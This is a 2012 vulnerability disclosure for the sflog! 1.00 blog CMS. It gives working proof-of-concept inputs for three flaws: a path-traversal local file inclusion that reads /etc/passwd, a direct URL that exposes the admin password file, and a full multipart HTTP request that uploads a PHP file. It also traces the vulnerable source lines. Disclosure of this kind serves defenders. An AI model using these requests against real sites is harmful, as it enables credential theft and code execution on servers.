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[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-07-05]
# [ sflog! <= 1.00 ]Multiple Vulnerabilities#
# Script: "sflog! is a flat and light CMS::Blog system."
# Vendor: http://sourceforge.net/projects/sflog/
# Download: http://sourceforge.net/projects/sflog/files/sflog/
# [ LFI ]
# PoC: http://localhost/sflog/index.php?blog=admin§ion=../../../../../../../etc/&permalink=passwd
# File: ./sflog/index.php (lines: 1, 53)
#1 <?php include("./includes/pageHeader.inc.php"); ?>// 1
#53require_once("./includes/entries.inc.php"); // 4
# File: ./sflog/includes/pageHeader.inc.php (lines: 20, 35)
#20 $_blogID = $_GET['blog'];// 2
#35$_sectionID = $_GET['section']; // 3
# File: ./sflog/includes/entries.inc.php (lines: 2-11)
#2include_once("./cms/BlogEntry.class.php"); // 5
#4$blog = new BlogEntry($_blogID,$_sectionID); // 6
#5$cms = new Blog();
#6$pages = $cms->getPostPerPage($_blogID);
#8// checks for permalink
#9if (isset($_GET['permalink'])){
# 10$_permalink = $_GET['permalink'];// 8
# 11$blog->showEntry($_permalink); // 9
# File: ./sflog/cms/BlogEntry.class.php (lines: 37-85)
# 37 class BlogEntry {
# 47function BlogEntry($blogID,$sectionID){// 7
# 48 error_reporting(E_USER_ERROR);//
# 49 $this->blogID = $blogID;//
# 50 $this->sectionID = $sectionID;//
# 51 }
# 57 function showEntry($entryID){ // 10
# 60$JournalContentDir = "./blogs/".$this->blogID."/data/".$this->sectionID; // 11
# 80$JournalContent = $JournalContentDir."/".$entryID; // 12
# 83include_once $JournalContent;// 13[LFI]
# [ Admin Password Disclosure ]
# PoC: http://localhost/sflog/admin/passwd
# [ Arbitrary File Upload ]
# File: ./sflog/admin/includes/uploadContent.inc.php (lines: 62-72)
#62 if (trim($_FILES['fileID']['name'])!=''){
#63 $uploaddir = BLOG_PATH.$blogID.BLOG_UPLOADS;
#64 $uploadfile = $uploaddir . basename($_FILES['fileID']['name']);
#65 echo '<pre>';
#66 if (move_uploaded_file($_FILES['fileID']['tmp_name'], $uploadfile)) {
#67 print(UPLOAD_SUCCESS);
#68 } else {
#69 print('<font color="red">'.UPLOAD_FAILED.'</font>');
#70 }
#71 print "</pre>";
#72 }
# PoC:
# POST /sflog/admin/includes/uploadContent.inc.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: pl,en-us;q=0.7,en;q=0.3
# Accept-Encoding: gzip, deflate
# Connection: keep-alive
# Content-Type: multipart/form-data; boundary=---------------------------4827543632391
# Content-Length: 411
# -----------------------------4827543632391
# Content-Disposition: form-data; name="blogID"
# admin
# -----------------------------4827543632391
# Content-Disposition: form-data; name="MAX_FILE_SIZE"
# 0
# -----------------------------4827543632391
# Content-Disposition: form-data; name="fileID"; filename="info.php"
# Content-Type: text/x-php
# <?php phpinfo(); ?>
# -----------------------------4827543632391--
# Uploaded file will be here: http://localhost/sflog/blogs/admin/uploads/info.php
### [ dun / 2012 ] #####################################################